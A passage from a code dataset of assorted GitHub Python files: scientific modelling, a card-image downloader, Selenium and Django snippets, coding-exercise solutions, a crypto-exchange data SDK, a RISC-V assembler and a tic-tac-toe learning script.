\"\"\"\n\n # split unknowns\n Na_i, Na_e, K_i, K_e, Cl_i, Cl_e, \\\n phi_i, phi_e, c = df.split(w)\n\n # input/output\n j_in = self.j_in(self.t_PDE)\n j_dec = self.j_dec(K_e)\n\n # total input/output fluxes\n j_in_K = j_in + j_dec\n j_in_Na = - j_in - j_dec\n j_in_Cl = df.Constant(0)\n\n j_in_k = [j_in_Na, j_in_K, j_in_Cl]\n\n # set the input fluxes\n self.input_fluxes = j_in_k\n\n return\n","repo_name":"hittheant/Simula_Summer_Project_1","sub_path":"src/ffian/zero_flow_model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"28010654961","text":"import requests\nimport json\nimport shutil\nimport re\nfrom pathlib import Path\n\ndef get_cardCode(cardCode, printings):\n return filter(lambda code: code.startswith(cardCode), printings)\n\ndef write_img(collection, cardCode):\n imageResp = requests.get(\"https://fabdb2.imgix.net/cards/printings/\"+ cardCode +\".png\")\n imageResp.raw.decode_content = True\n if (\"-CF\" in cardCode):\n cardCode = cardCode.replace(\"-CF\", \"\")\n elif (\"-RF\" in cardCode):\n cardCode = cardCode.replace(\"-RF\", \"\")\n image = open(\"images/\"+ collection +\"/\"+ cardCode +\".png\", \"wb\")\n image.write(imageResp.content)\n image.close()\n print(imageResp.status_code, \"Saved\", cardCode)\n\ndef build_releases(collection, dataset, limited=False):\n Path(\"images/\"+collection).mkdir(parents=True, exist_ok=True)\n if limited:\n Path(\"images/u-\"+collection).mkdir(parents=True, exist_ok=True)\n\n for card in dataset:\n result = get_cardCode(card[\"cardCode\"], card[\"printings\"])\n write_img(collection, list(result)[0])\n if limited:\n result = get_cardCode(\"U-\"+card[\"cardCode\"], card[\"printings\"])\n write_img(\"u-\"+collection, list(result)[0])\n\ndef main():\n datasets = [\"cards/wtr.json\", \"cards/arc.json\", \"cards/mon.json\", \"cards/cru.json\"]\n limited = [True, True, True, False] # set to true if you want to download 1st edition\n\n for fname in datasets:\n jfile = open(fname, \"r\")\n collection = fname.split(\"/\")[1].replace(\".json\", \"\")\n build_releases(collection, json.loads(jfile.read()), limited[datasets.index(fname)])\n jfile.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"aCard0s0/FabScripts","sub_path":"build_imgs.py","file_name":"build_imgs.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"20657486162","text":"import time\n\nfrom selenium import webdriver\n\nfrom selenium.webdriver.common.by import By\n\ndriver = webdriver.Edge(executable_path=r'C:\\Users\\User\\Desktop\\msedge.exe')\ndriver.implicitly_wait(5)\ndriver.get(\"https://the-internet.herokuapp.com/iframe\")\ndriver.switch_to.frame(\"mce_0_ifr\")\ndriver.find_element(By.CSS_SELECTOR,\"#tinymce\").clear()\n\ndriver.find_element(By.CSS_SELECTOR,\"#tinymce\").send_keys(\"I am able to automate frames\")\ndriver.switch_to.default_content()\nprint(driver.find_element(By.CSS_SELECTOR,\"h3\").text)\ntime.sleep(4)\n","repo_name":"USERfrnd/Git","sub_path":"pythonProject2/frames.py","file_name":"frames.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"72769636459","text":"import copy\n\nfrom gefest.core.algs.geom.validation import out_of_bound, self_intersection, too_close, intersection, unclosed_poly, \\\n is_contain, 
distance_between_points\nfrom gefest.core.structure.structure import Structure\n\n\ndef check_constraints(structure: Structure, is_lightweight: bool = False, domain=None, model_func=None) -> bool:\n try:\n if any([(poly is None or\n len(poly.points) == 0 or\n any([pt is None for pt in poly.points]))\n for poly in structure.polygons]):\n print('Wrong structure - problems with points')\n return False\n\n cts = [out_of_bound(structure, domain),\n too_close(structure, domain),\n is_contain(structure, domain),\n self_intersection(structure),\n intersection(structure, domain),\n unclosed_poly(structure, domain),\n distance_between_points(structure, domain)]\n structurally_correct = not any(cts)\n\n if not structurally_correct:\n return structure\n except Exception as ex:\n print(ex)\n import traceback\n print(traceback.format_exc())\n return False\n\n return structure\n","repo_name":"SoloWayG/Test","sub_path":"gefest/core/opt/constraints.py","file_name":"constraints.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"72812200619","text":"'''\n有字符串\"万过薪月,员序程马黑来,nohtyP学\"\n1、使用学过的任何方法,得到:\"黑马程序员\"\n提示:\n# 1、倒序字符串,切片取出,或者切片取出然后倒序\n# 2、split分隔\",\",replace替换\"来\"为空,倒序字符串\n'''\n\nstr = \"万过薪月,员序程马黑来,nohtyP学\"\n\n# num3 = len(str)\n# print(f\"字符串的长度是{num3}\")\n# ## 得到19,即正序[0, 18]或倒序[-1, -19]\n\n# 1\n\n## 先倒序再取值\nstr1 = str[::-1]\n\nindex1 = str1.index(\"黑\")\nindex2 = str1.index(\"员\")\nprint(f\"倒序黑字的下标为{index1},员的下标为{index2}\") # 得到9,13\nresult1 = str1[9:13+1]\nprint(f\"方法1:{result1}\")\n\n# 2\n\n## 先取出再倒序\nindex1 = str.index(\"员\")\nindex2 = str.index(\"黑\")\nprint(f\"正序黑字的下标为{index1},员的下标为{index2}\") # 得到5,9\nstr2 = str[5:9+1]\nresult2_1 = str2[::-1]\nprint(f\"方法2.1:{result2_1}\")\n\n## 整合写法\nresult2_2 = str[5:9+1][::-1]\nprint(f\"方法2.2:{result2_2}\")\n\n# 3\n\n## 先split分割\nstr3 = str.split(\",\")\n## 取split的中间部分\nstr3_1 = str3[1]\n## 再replace替换\nstr3_2 = str3_1.replace(\"来\", \"\")\n## 取倒序\nresult3_1 = str3_2[::-1]\nprint(f\"方法3.1:{result3_1}\")\n\n## 整合写法\nresult3_2 = str.split(\",\")[1].replace(\"来\", \"\")[::-1]\nprint(f\"方法3.2:{result3_2}\")\n\n# 总结:\n# 方法3不需要考虑下标,相对简洁,但要求对序列整体有充分把握;\n# 方法1和2的情况适合,序列很大不能完全掌握,只有模糊印象,需要下标来定位需要改动的位置","repo_name":"Waynecold/MyVSCode","sub_path":"Python/MyFirstPython/6-函数容器/6-11-序列切片的示例.py","file_name":"6-11-序列切片的示例.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"33306100285","text":"# Given an array A of integers and integer K, return the maximum S such that the\n# re exists i < j with A[i] + A[j] = S and S < K. If no i, j exist satisfying this\n# equation, return -1. 
\n# \n# \n# \n# Example 1: \n# \n# \n# Input: A = [34,23,1,24,75,33,54,8], K = 60\n# Output: 58\n# Explanation: \n# We can use 34 and 24 to sum 58 which is less than 60.\n# \n# \n# Example 2: \n# \n# \n# Input: A = [10,20,30], K = 15\n# Output: -1\n# Explanation: \n# In this case it's not possible to get a pair sum less that 15.\n# \n# \n# \n# \n# Note: \n# \n# \n# 1 <= A.length <= 100 \n# 1 <= A[i] <= 1000 \n# 1 <= K <= 2000 \n# \n# Related Topics Array\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution(object):\n def twoSumLessThanK(self, A, K):\n \"\"\"\n :type A: List[int]\n :type K: int\n :rtype: int\n \"\"\"\n A.sort()\n ans = -1\n n = len(A)\n for i in range(n):\n if A[i] >= K: break\n for j in range(i + 1, n):\n if A[j] >= K: break\n if A[i] + A[j] < K:\n ans = max(ans, A[i] + A[j])\n return ans\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"hdlldh/leetcode_python","sub_path":"leetcode/editor/en/[1099]Two Sum Less Than K.py","file_name":"[1099]Two Sum Less Than K.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"18766558900","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n\"\"\"jobboard URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls import url, include, patterns\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\n#from home.views import IndexView\n\nurlpatterns = patterns('',\n #url(r'^', include('jobboard.home.urls', namespace=\"home\")),\n #url(r'^grappelli/', include('grappelli.urls')), \n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'home.views.myhome', name='home'),\n url(r'^contact/$', 'home.views.sendMail', name='sendMail'),\n url(r'^legal/$', 'home.views.legal', name='legal'),\n url(r'^tos/$', 'home.views.tos', name='tos'),\n url(r'^publicity/$', 'home.views.publicity', name='publicity'),\n url(r'^mobileapp/$', 'home.views.mobileapp', name='mobileapp'),\n url(r'^subscription/$', 'home.views.subscription', name='subscription'),\n url(r'^sitemap/$', 'home.views.sitemap', name='sitemap'),\n url(r'^magazine/$', 'home.views.magazine', name='magazine'),\n #url(r'^ajout/$', 'home.views.ajout', name='ajout'),\n url(r'^article/$', 'home.views.addArticle', name='addarticle'),\n url(r'^nouvo/$', 'home.views.nouvo', name='nouvo'),\n url(r'^slide/$', 'home.views.slide', name='slide'),\n url(r'^search/$', 'home.views.search_sap', name='search'),\n #url(r'^souscriptionnews/', 'home.views.addSouscripteurNews', name='news'),\n url(r'^myview/(?P[0-9]+)/$', 'home.views.myview', name='myview'),\n url(r'^categories/(?P[0-9]+)/$', 'home.views.articles', name='categories'),\n #url(r'^myview/(?P[0-9]+)/categorie=(?P[a-z]+)', 'home.views.myview', name='myview'),\n url(r'^slideview/(?P[0-9]+)/$', 'home.views.slideView', name='slide'),\n url(r'^about/$', 'jobboard.views.about', name='about'),\n #url(r'^accounts/', include('registration.backends.simple.urls')),\n url(r'^ckeditor/', include('ckeditor_uploader.urls')),\n url(r'^filer/', include('filer.urls')),\n url(r'^ratings/', include('star_ratings.urls', namespace='ratings', app_name='ratings')),\n\n url(r'^accounts/', include('allauth.urls')),\n url(r'^chaining/', include('smart_selects.urls')),\n\n\n\n \n\n)\nhandler403 = 'jobboard.views.permission_denied_view'\n\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"prabu3192/sandp","sub_path":"jobboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"72020423021","text":"\"\"\"\nAuthor: thomaszdxsn\n\"\"\"\nimport asyncio\nfrom datetime import datetime\nfrom urllib.parse import urljoin\nfrom typing import Union, Callable\n\nfrom . 
import WebsocketSdkAbstract, RestSdkAbstract\nfrom ..schemas import Params\n\n__all__ = (\n 'GateIORest',\n)\n\n\nclass GateIORest(RestSdkAbstract):\n \"\"\"\n doc: https://gate.io/api2\n \"\"\"\n base_url = 'https://data.gateio.io'\n _ticker_url = '/api2/1/ticker/{symbol}'\n _depth_url = '/api2/1/orderBook/{symbol}'\n _trades_url = '/api2/1/tradeHistory/{symbol}'\n _kline_url = '/api2/1/candlestick2/{symbol}'\n\n def _ticker_request(self, symbol: str) -> Params:\n url = urljoin(\n self.base_url, \n self._ticker_url.format(symbol=symbol)\n )\n return Params(args=(url,))\n\n def _depth_request(self, symbol: str) -> Params:\n url = urljoin(\n self.base_url, \n self._depth_url.format(symbol=symbol)\n )\n return Params(args=(url,))\n\n def _trades_request(self, \n symbol: str,\n tid: Union[str, None]=None) -> Params:\n url = urljoin(\n self.base_url, \n self._trades_url.format(symbol=symbol)\n )\n if tid:\n url = f\"{url}/{tid}\"\n return Params(args=(url,))\n\n def _kline_request(self,\n symbol: str,\n group_sec: int=60,\n range_hour: int=1) -> Params:\n url = urljoin(\n self.base_url,\n self._kline_url.format(symbol=symbol)\n )\n request_data = {\n 'params': {\n 'group_sec': group_sec,\n 'range_hour': range_hour\n }\n }\n return Params(\n args=(url,),\n kwargs=request_data\n )\n \n\nclass GateIOWebsocket(WebsocketSdkAbstract):\n \"\"\"\n doc: https://gateio.io/docs/websocket/index.html\n \"\"\"\n _servertime_id = 100\n _alternative_ws_url = 'wss://ws.gate.io/v3/'\n ws_url = 'wss://ws.gateio.io/v3/'\n\n async def subscribe(self, *args, **kwargs):\n if not self.ws_client:\n await self.setup_ws_client()\n # subscribe server time\n server_time_chann = {\n 'id': self._servertime_id,\n 'method': 'server.time',\n 'params': []\n }\n await self.ws_client.send_json(server_time_chann)\n await super().subscribe(*args, **kwargs)\n\n async def connect(self, handler: Callable):\n # 这个ws接口需要重复request才会返回数据\n i = 1\n chan_nums = len(self.register_hub) + 1\n async for msg in self.ws_client:\n await handler(msg)\n if i % chan_nums == 0: # TODO: 需要为每个数据类型配置不同的sleep时间\n await asyncio.sleep(1) # TODO: need configify\n i = 0\n await self.subscribe()\n i += 1\n\n def register_ticker(self, \n market: str,\n id_: int, \n period: int=86400):\n channel_info = {\n 'id': id_,\n 'method': 'ticker.query',\n 'params': [market.upper(), period]\n }\n self.register_channel(channel_info)\n\n def register_depth(self,\n market: str,\n id_: int,\n limit: int=20,\n interval: str='0.000000000001'):\n channel_info = {\n 'id': id_,\n 'method': 'depth.query',\n 'params': [market.upper(), limit, interval]\n }\n self.register_channel(channel_info)\n\n def register_trades(self,\n market: str,\n id_: int,\n last_id: int=0,\n limit: int=20):\n channel_info = {\n 'id': id_,\n 'method': 'trades.query',\n 'params': [market.upper(), limit, last_id]\n }\n self.register_channel(channel_info)\n\n def register_kline(self,\n market: str,\n id_: int,\n start: int=1,\n end: Union[int, None]=None,\n interval=60):\n if end is None:\n end = int(datetime.now().timestamp())\n channel_info = {\n 'id': id_,\n 'method': 'kline.query',\n 'params': [market.upper(), start, end, interval]\n }\n self.register_channel(channel_info)","repo_name":"thomaszdxsn/MarketKing","sub_path":"src/sdk/gateio.py","file_name":"gateio.py","file_ext":"py","file_size_in_byte":4532,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"92"} +{"seq_id":"5876318235","text":"import re\n\n\ndef solution(user_id, banned_id):\n banned_pattern = 
list(map(lambda x: \"^\" + x.replace(\"*\", \".\") + \"$\", banned_id))\n banned_set = set()\n visited = [0] * len(user_id)\n\n\n def f(n):\n if n == len(banned_id):\n banned_set.add(tuple(visited))\n return\n for i in range(len(user_id)):\n if visited[i] == 0 and re.match(banned_pattern[n], user_id[i]):\n visited[i] = 1\n f(n+1)\n visited[i] = 0\n\n\n f(0)\n answer = len(banned_set)\n return answer","repo_name":"kiung22/algorithm-problem-solving","sub_path":"Programmers/level3/불량사용자.py","file_name":"불량사용자.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"197870884","text":"\"\"\"\nhttps://www.hackerrank.com/contests/justcode/challenges/lru-implementtion\n\nGiven:\nN: no of elements\nS: max. capacity of cache\na[i]: N no. of integers\n\nOutput:\nPF: No. of page faults.\nState of LRU cache.\n\nPage falut occures when the element is not found in the cache.\nIn LRU algo , the least recently elements is removed first when no free space is avalaible in cache.\n\nInput Format\n\nN: no of elements\nS: max. capacity of cache\na[i]: N no. of integers\nConstraints\n\nN ,S & a[i] all are integers\n\nOutput Format\nPF:page fault\nelements in LRU cache.\n\nSample Input\n10 4\n1 2 3 2 5 3 4 5 8 9\nSample Output\n7\n9 8 5 4\nExplanation\nInitially cache will be empty.\n1 _ _ _ 1\n2 1 _ _ 2\n3 2 1 _ 3\n2 3 1 _ 3\n5 2 3 1 4\n3 5 2 1 4\n4 3 5 2 5\n5 4 3 2 5\n8 5 4 3 6\n9 8 5 4 7\ntherefore: pagefaults = 7. state : 9 8 5 4.\n\n\"\"\"\n\nfrom collections import OrderedDict\n\n\nclass LRU():\n def __init__(self, S:int) -> None:\n self.capacity = S\n self._cache = OrderedDict() # {value:}\n\n def process(self, N:int, data:list[int]) -> tuple[int,list[int]]:\n if N != len(data):\n raise ValueError(f\"size of input data doesn't match {N}\")\n pf = 0 # page-fault\n for d in data:\n if not self.cache(d):\n pf += 1\n state = [d for d in self._cache]\n state.reverse()\n return (pf, state)\n\n def cache(self, data:int) -> bool:\n if data in self._cache: # hit\n self._cache.move_to_end(data, last=True)\n return True\n if len(self._cache) < self.capacity:\n self._cache[data] = True # key=data, the value doesn't matter\n else:\n self._cache.popitem(last=False)\n self._cache[data] = True\n return False\n \n\ndef test():\n data = [\n ((10, 4, [1, 2, 3, 2, 5, 3, 4, 5, 8, 9]), (7,[9, 8, 5, 4])),\n ]\n result = \"\"\n for (N, S, d), (pf,state) in data:\n s = LRU(S)\n r1, r2 = s.process(N, d)\n if r1 != pf or r2 != state:\n result = \"FAIL\"\n else:\n result = \"PASS\"\n print(f\"{result}, ({r1},{r2}), exp ({pf},{state})\")\n\n\ntest()\n\n\n","repo_name":"icoding2016/study","sub_path":"PY/hackrank/LRU_implementation.py","file_name":"LRU_implementation.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"36856144301","text":"for _ in range(int(input())):\n n, m = map(int, input().split())\n placed = {}\n floating = {}\n a, b, d = map(int, input().split())\n placed[b] = 0\n placed[a] = d\n for i in range(m-1):\n a, b, d = map(int, input().split())\n if b not in placed and a not in placed:\n floating[a] = (b, d)\n floating[b] = (a, d)\n elif b in placed:\n if a in placed:\n if placed[a]-placed[b] != d: break\n elif a in floating:\n placed[a] = placed[b] + d\n placed[floating[a][0]] = placed[a] - placed[floating[a][1]]\n floating.pop(a)\n floating.pop(b)\n else:\n placed[a] = placed[b] + d\n elif a in placed:\n if b in 
floating:\n placed[b] = placed[a] - d\n placed[floating[b][0]] = placed[b] - placed[floating[b][1]]\n floating.pop(a)\n floating.pop(b)\n else:\n placed[b] = placed[a] - d\n else:\n print(\"YES\")\n continue\n print(\"NO\")","repo_name":"JaydenPahukula/competitive-coding","sub_path":"Codeforces/886/H.py","file_name":"H.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"74117422058","text":"#!/usr/bin/env python3\nimport sys\nimport struct\nimport string\nimport re\nfrom .instructions import instruction_specs\nfrom .encode import encoder\nfrom .constant import CONDITIONAL_JUMP_INSTRS\nfrom .syntax_sugars import syntax_sugar_specs\n\n# utilities for general\ndef exit_with_error(fmt):\n print(fmt)\n exit(1)\n\ndef is_num(s):\n return re.match(r'^(-)?(0x)?[0-9A-Fa-f][0-9A-Fa-f]*$', s) is not None\n\n# utilities for label controll\ndef get_raw_label(label):\n label_inside = re.match(r\"^\\%lo\\((.*)\\)$\", label)\n if label_inside is not None:\n return label_inside.groups()[0]\n else:\n return label\n \ndef label_to_imm(labels, label, current_offset):\n label_inside = re.match(r\"^\\%lo\\((.*)\\)$\", label)\n if label_inside is not None:\n label = label_inside.groups()[0]\n return labels[label] * 4\n else:\n return (labels[label] - current_offset) * 4\n \ndef replace_label_by(args, imm):\n return args[:-1] + [imm]\n\ndef get_label_in_args(spec, args):\n if(spec[\"type\"] in [\"b\", \"i\", \"s\"] \\\n and len(args) == 3 \\\n and not is_num(args[2])):\n return args[2]\n elif (spec[\"type\"] in [\"j\", \"u\"] \\\n and len(args) == 2 \\\n and not is_num(args[1])):\n return args[1]\n elif ('arg_num' in spec \\\n and len(args) == spec['arg_num'] \\\n and not is_num(args[len(args)-1])):\n return args[len(args)-1] \n else:\n return None\n\ndef has_label(x):\n return x[3] is not None\n\ndef is_label_valid(x, labels):\n return has_label(x) and get_raw_label(x[3]) in labels\n\n# utilities for instruction controll\ndef is_instr(instr_name):\n return instr_name in instruction_specs\n\ndef is_syntax_sugar(instr_name):\n return instr_name in syntax_sugar_specs\n\ndef get_spec(instr_name):\n if is_instr(instr_name):\n return instruction_specs[instr_name]\n elif is_syntax_sugar(instr_name):\n return syntax_sugar_specs[instr_name]\n else:\n return None\n\n# utilities for encoding \ndef encode_by_spec(spec, args, line_num, options):\n try:\n if \"encoder\" in spec:\n return (spec[\"encoder\"])(spec, args, options)\n elif \"type\" in spec:\n return (encoder[spec[\"type\"]])(spec, args, options)\n else:\n return None\n except OverflowError:\n exit_with_error(\"[-] overflow occcuerd at {}\".format(line_num))\n except IndexError:\n exit_with_error(\"[-] invalid arguments for {} at {}\".format(instr_name,\n line_num))\n \ndef quick_encode(lines):\n parsed_instructions = []\n labels = {}\n instructions = []\n \n for line_num, raw_l in map(lambda x: (x[0]+1, x[1]), enumerate(lines)):\n # pre-processing\n stripped_line = raw_l.strip().split(';')[0].strip()\n if stripped_line == '':\n continue \n components = list(map(lambda y: y.strip(), stripped_line.split()))\n\n # if the line describes ...\n if components[0].endswith(':'):\n # labels\n label = components[0] [:-1]\n offset = len(instructions)\n if label in labels:\n exit_with_error(\"[-] label name duplicated: {}\".format(label))\n labels[label] = offset \n else:\n # instructions \n instr_name = components[0]\n args = list(map(lambda x: x.strip(), ' 
'.join(components[1:]).split(',')))\n spec = get_spec(instr_name)\n if spec is None:\n exit_with_error(\"[-] instruction not found at {}: {}\".format(line_num,\n instr_name))\n target_label = get_label_in_args(spec, args)\n parsed_instruction = [instr_name,\n args,\n len(instructions),\n target_label,\n line_num,\n 1]\n imm_patches = [0] if has_label(parsed_instruction) else asm_instruction(parsed_instruction)\n parsed_instruction[5] = len(imm_patches)\n \n instructions.extend(imm_patches)\n parsed_instructions.append(parsed_instruction)\n \n return parsed_instructions, instructions, labels\n\ndef asm_instruction(parsed_instruction, labels = {}):\n instr_name, args, offset, target_label, line_num, current_size = parsed_instruction\n spec = get_spec(instr_name)\n if has_label(parsed_instruction):\n return encode_by_spec(spec,\n replace_label_by(args,\n label_to_imm(labels,\n target_label,\n offset)),\n line_num,\n {\"pc\": offset, \"current_size\": current_size, \"line_num\": line_num})\n else:\n return encode_by_spec(spec, args, line_num, {\"pc\": offset, \"current_size\": current_size, \"line_num\": line_num})\n\n# utilities for label resolution\ndef update_instruction_sizes(labelled_instructions, instructions, labels):\n is_size_changed = False\n for i in range(0, len(labelled_instructions)):\n offset = labelled_instructions[i][2]\n current_size = labelled_instructions[i][5]\n imm_patches = asm_instruction(labelled_instructions[i], labels)\n if len(imm_patches) > current_size:\n diff = len(imm_patches) - current_size \n # update current_size\n labelled_instructions[i][5] = len(imm_patches)\n # update instructions\n for _ in range(0, diff):\n instructions.insert(offset+1, 0) \n # update labels\n for k in labels.keys():\n if labels[k] > offset:\n labels[k] += diff\n # update info for all instructions with label references\n for j in range(0, len(labelled_instructions)):\n if labelled_instructions[j][2] > offset:\n labelled_instructions[j][2] += diff\n # set is_size_changed flag to resolve labels again\n is_size_changed = True\n return labelled_instructions, instructions, labels, is_size_changed\n\n# utilities to output asm\ndef asm_lines(lines):\n \"\"\"\n Asm given lines and returns machine codes in binary format. 
\n\n Parameters\n ----------\n lines : list of str\n lines to be assembled.\n\n Returns\n -------\n _ : bytes\n rv32im machine codes in binary format.\n \"\"\"\n \n\n # parse lines & quick encode\n ################\n parsed_instructions, instructions, labels = quick_encode(lines)\n \n # resolve instruction sizes\n ################ \n # first, we have to check the existance of labels.\n if any(list(map(lambda x: has_label(x) and not is_label_valid(x, labels),\n parsed_instructions))):\n instr = next(filter(lambda x: has_label(x) and not is_label_valid(x, labels), parsed_instructions))\n target_label = instr[3]\n line_num = instr[4]\n exit_with_error(\"[-] invalid label found at {}: {}\".format(line_num, target_label))\n\n # second, we have to fix the size of each labelled instruction.\n # here we assume that the bigger the imm is, the more space is used.\n is_size_changed = True\n labelled_instructions = list(filter(has_label, parsed_instructions))\n while is_size_changed:\n labelled_instructions, instructions, labels, is_size_changed = \\\n update_instruction_sizes(labelled_instructions, instructions, labels)\n\n # resolve labels and emit\n ################\n # after fixing the size of instructions, we can patch all the labels with imm!\n for labelled_instruction in labelled_instructions:\n offset = labelled_instruction[2]\n imm_patches = asm_instruction(labelled_instruction, labels)\n for j in range(0, len(imm_patches)):\n instructions[offset+j] |= imm_patches[j]\n \n # pack all instructions\n ################\n assembled_code = b''.join([struct.pack(' [ ...]\".format(sys.argv[0]))\n exit(1)\n\n mcode, labels = asm_files(sys.argv[2:])\n with open(sys.argv[1], 'wb') as f:\n f.write(mcode)\n with open(sys.argv[1] + '.symbols', 'w') as f:\n f.write('\\n'.join(map(lambda x: '{} {}'.format(x[0], str(4 * x[1])), labels.items())))\n \nif __name__ == '__main__':\n main()\n","repo_name":"cpuex2019-7th/assembler","sub_path":"cpuex_asm/asm.py","file_name":"asm.py","file_ext":"py","file_size_in_byte":9609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"14759930163","text":"from queries.unique_rel import UniqueRel\nfrom queries.unique_node import UniqueNode\nimport flask\nimport pytest\n\nd = dict(test_prop1=\"test_val1\", test_prop2=\"test_val2\")\n\n\ndef test_create_rel(reset_db):\n app = flask.Flask(__name__)\n with app.app_context():\n u1 = UniqueNode(uid='testid1', propone='propone', proptwo='proptwo')\n u2 = UniqueNode(uid='testid2', propone='propone', proptwo='proptwo')\n\n # create nodes in graph\n u1.create_node()\n u2.create_node()\n\n # create rel\n r1 = UniqueRel(**d)\n r1.create_rel(u1, u2)\n\n # check rel created\n props = UniqueRel.get_rel_props(u1, u2)\n assert props['test_prop1'] == \"test_val1\"\n assert props['test_prop2'] == \"test_val2\"\n\n\ndef test_del_rel(reset_db):\n app = flask.Flask(__name__)\n with app.app_context():\n u1 = UniqueNode(uid='testid1', propone='propone', proptwo='proptwo')\n u2 = UniqueNode(uid='testid2', propone='propone', proptwo='proptwo')\n\n # create nodes in graph\n u1.create_node()\n u2.create_node()\n\n # delete rel\n UniqueRel.delete_rel(u1, u2)\n\n # check rel deleted\n with pytest.raises(LookupError):\n UniqueRel.get_rel_props(u1, 
u2)\n","repo_name":"MRCIEU/opengwas-api","sub_path":"app/queries/tests/test_unique_rel.py","file_name":"test_unique_rel.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"19369129497","text":"class Employee:\r\n def __init__(self,n,d,s,lb):\r\n self.name=n\r\n self.designation=d\r\n self.salary=s\r\n self.leaveBalance=lb\r\nclass Organization:\r\n def __init__(self,elist):\r\n self.employee_list=elist\r\n def checkLeaveEligibility(self,empname,tl,nol):\r\n for i in self.employee_list:\r\n\r\n if i.name==empname:\r\n for a,b in i.leaveBalance.items():\r\n if a==tl:\r\n if b>=nol:\r\n i.leaveBalance[a]=b-nol\r\n\r\n return 'True'\r\n else:\r\n return 'False'\r\n return 'not_found'\r\n def display_details(self,name):\r\n for i in self.employee_list:\r\n if i.name==name:\r\n for a,b in i.leaveBalance.items():\r\n print(a+':'+str(b))\r\nelist=[]\r\nnum=int(input())\r\nfor i in range(num):\r\n leaves={}\r\n name=str(input())\r\n designation=str(input())\r\n salary=int(input())\r\n for j in range(int(input())):\r\n tl=str(input())\r\n nol=int(input())\r\n leaves[tl]=nol\r\n elist.append(Employee(name,designation,salary,leaves))\r\n\r\n\r\nobj=Organization(elist)\r\nempname=str(input())\r\n\r\ntl=str(input())\r\nnol=int(input())\r\nif (obj.checkLeaveEligibility(empname,tl,nol)=='True'):\r\n print('Leave Granted')\r\n obj.display_details(empname)\r\nelif obj.checkLeaveEligibility(empname, tl, nol) == 'False':\r\n print('Leave Not Granted')\r\n obj.display_details(empname)\r\nelif obj.checkLeaveEligibility(empname, tl, nol) == 'not_found':\r\n print('Leave Not Granted')\r\n print('No Employee Found')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"saipraveen333/Coding-Samples","sub_path":"EMPLOYEE_OOPS.py","file_name":"EMPLOYEE_OOPS.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4859334051","text":"''' dqn learning '''\n\n# import tensorflow as tf\nimport tensorflow.compat.v1 as tf\n\nimport tictactoe.utils as utils\nfrom tictactoe.agent import DualAgent\n\nfrom .agent import MyAgent\n\ntf.disable_v2_behavior()\n\nAGENT1_DATA_PATH = \"./models/pgn1.ckpt\"\nAGENT2_DATA_PATH = \"./models/pgn2.ckpt\"\n\ndef build_agent():\n ''' build agent for learning '''\n # create pgn agent1 & agent2\n agent1 = MyAgent()\n agent2 = MyAgent()\n\n sess = tf.Session()\n agent1.set_session(sess)\n agent2.set_session(sess)\n sess.run(tf.global_variables_initializer())\n\n agent1.load(AGENT1_DATA_PATH)\n agent2.load(AGENT2_DATA_PATH)\n\n return agent1, agent2\n\nMAX = 1000000\nSTEP = 1000\n\ndef learn(env, best_agent):\n ''' Policy Gradient learning '''\n\n agent1, agent2 = build_agent()\n\n dual = DualAgent(agent1, agent2)\n dual_x = DualAgent(agent1, best_agent)\n dual_o = DualAgent(best_agent, agent2)\n\n full_tie = 0\n\n for step in range(0, MAX, STEP):\n dual.set_train_mode(True)\n for _ in range(STEP):\n 